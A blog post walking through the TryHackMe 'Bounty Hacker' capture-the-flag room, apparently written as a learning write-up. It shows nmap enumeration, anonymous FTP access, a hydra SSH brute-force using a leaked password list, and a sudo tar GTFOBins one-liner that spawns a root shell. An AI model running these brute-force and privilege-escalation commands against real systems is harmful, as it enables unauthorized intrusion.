DEV Community


Posted on

TryHackMe Bounty Hacker Room Walkthrough

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

1) Enumeration / Service Discovery

# Nmap 7.91 scan initiated Mon Jul 26 08:17:23 2021 as: nmap -p- -A -Pn -oA resultsNmap -vv
adjust_timeouts2: packet supposedly had rtt of -495795 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -495795 microseconds.  Ignoring time.
Nmap scan report for
Host is up, received user-set (0.16s latency).
Scanned at 2021-07-26 08:17:24 IST for 800s
Not shown: 55529 filtered ports, 10003 closed ports
Reason: 55529 no-responses and 10003 resets
21/tcp open  ftp     syn-ack ttl 60 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQj
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
|   256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open  http    syn-ack ttl 60 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Enter fullscreen mode Exit fullscreen mode

2) Foothold


  • Port 80 - Apache 2.4.18

  • Home page seems to have a big image from the Cowboy Bebop anime. Which seems to be stored in the /images/ dir. Visiting that dir shows that dir listing allowed. Running feroxbuster on the web portal in parallel.

Alt Text
Alt Text

  • FTP Anon login allowed. Got two files -> locks.txt and tasks.txt.
└─$ ftp                                                                  
Connected to                                                                                                                                                  
220 (vsFTPd 3.0.3)                                                                                                                                                         
Name ( Anonymous                                                                                                                                         
230 Login successful.                                                                
Remote system type is UNIX.                                                          
Using binary mode to transfer files.                                                 
ftp> ls                                                                              
200 PORT command successful. Consider using PASV.                                    
150 Here comes the directory listing.                                                                                                                                      
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt                    
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt                     
226 Directory send OK.
Enter fullscreen mode Exit fullscreen mode


1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

Enter fullscreen mode Exit fullscreen mode

Q3: Who wrote the task list?

A3: lin

locks.txt seems to contain a what looks like a list of passwords.
Alt Text

Let's try to bruteforce ssh with the probable password list provided and the username lin

└─$ hydra -l lin -P locks.txt ssh://
[22][ssh] host:   login: lin   password: CENSORED
Enter fullscreen mode Exit fullscreen mode


Q4: What service can you bruteforce with the text file found?

Q5: What is the users password?
A5: Result of ssh bruteforce using hydra

Let's ssh into the machine with this username/password combo. This allows us to get user.txt

Q6: user.txt
A6: Answer in /home/lin/user.txt

Now we have a proper foothold in the machine.

3) Privilege Escalation

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
Enter fullscreen mode Exit fullscreen mode

So we can run tar as root user. Note the absence of NOPASSWD here. You will still need the lin user`s password to do this. Fortunately we have that.

Using Tar GTFOBins for Privilege Escalation


lin@bountyhacker:~/Desktop$ sudo tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
# id
uid=0(root) gid=0(root) groups=0(root)
Enter fullscreen mode Exit fullscreen mode


Use this shell to navigate to /root/ and get the root flag.

Q7: root.txt
A7: Answer in /root/root.txt

Pretty simple box to solve. Thanks for reading!

Try it at

Discussion (0)